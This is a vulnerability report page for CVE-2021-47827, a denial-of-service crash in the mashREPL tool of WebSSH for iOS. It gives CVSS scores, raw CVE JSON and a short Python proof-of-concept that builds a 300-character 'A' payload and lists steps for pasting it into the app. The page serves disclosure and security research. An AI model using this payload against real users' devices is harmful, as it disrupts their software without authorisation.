Security Vulnerability Report
中文
CVE-2021-47827 CVSS 7.5 HIGH

CVE-2021-47827

Published: 2026-01-16 19:16:08
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

WebSSH for iOS 14.16.10 contains a denial of service vulnerability in the mashREPL tool that allows attackers to crash the application by pasting malformed input. Attackers can trigger the vulnerability by copying a 300-character buffer of repeated 'A' characters into the mashREPL input field, causing the application to crash.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WebSSH for iOS <= 14.16.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2021-47827 PoC - WebSSH for iOS mashREPL DoS # Generate 300 'A' characters to trigger the vulnerability def generate_dos_payload(): """ Generate malformed input to trigger DoS in WebSSH for iOS mashREPL The vulnerability is triggered by pasting a 300-character buffer of repeated 'A' characters """ # 300 'A' characters payload payload = 'A' * 300 # Copy to clipboard (for manual testing on iOS device) print(f"Generated payload length: {len(payload)}") print(f"Payload content: {payload}") print("\nTo exploit:") print("1. Copy the above payload") print("2. Open WebSSH for iOS app") print("3. Navigate to mashREPL tool") print("4. Paste the payload into the input field") print("5. Application should crash immediately") return payload def generate_ios_shortcut_script(): """ Generate an iOS Shortcut script for automated exploitation This can be used to demonstrate the vulnerability on iOS devices """ script = ''' on run set payload to "" & (character id 65 as text) repeated 300 times set the clipboard to payload tell application "WebSSH for iOS" to activate -- User needs to manually paste in mashREPL end run ''' return script if __name__ == "__main__": payload = generate_dos_payload() print("\n" + "="*60) print("CVE-2021-47827 PoC - WebSSH for iOS mashREPL DoS") print("CVSS Score: 7.5 (High)") print("="*60)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47827", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:07.703", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebSSH for iOS 14.16.10 contains a denial of service vulnerability in the mashREPL tool that allows attackers to crash the application by pasting malformed input. Attackers can trigger the vulnerability by copying a 300-character buffer of repeated 'A' characters into the mashREPL input field, causing the application to crash."}, {"lang": "es", "value": "WebSSH para iOS 14.16.10 contiene una vulnerabilidad de denegación de servicio en la herramienta mashREPL que permite a los atacantes bloquear la aplicación al pegar una entrada malformada. Los atacantes pueden activar la vulnerabilidad al copiar un búfer de 300 caracteres de caracteres 'A' repetidos en el campo de entrada de mashREPL, lo que provoca que la aplicación se bloquee."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://apps.apple.com/mx/app/webssh-ssh-client/id497714887", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49883", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/webssh-for-ios-mashrepl-denial-of-service", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.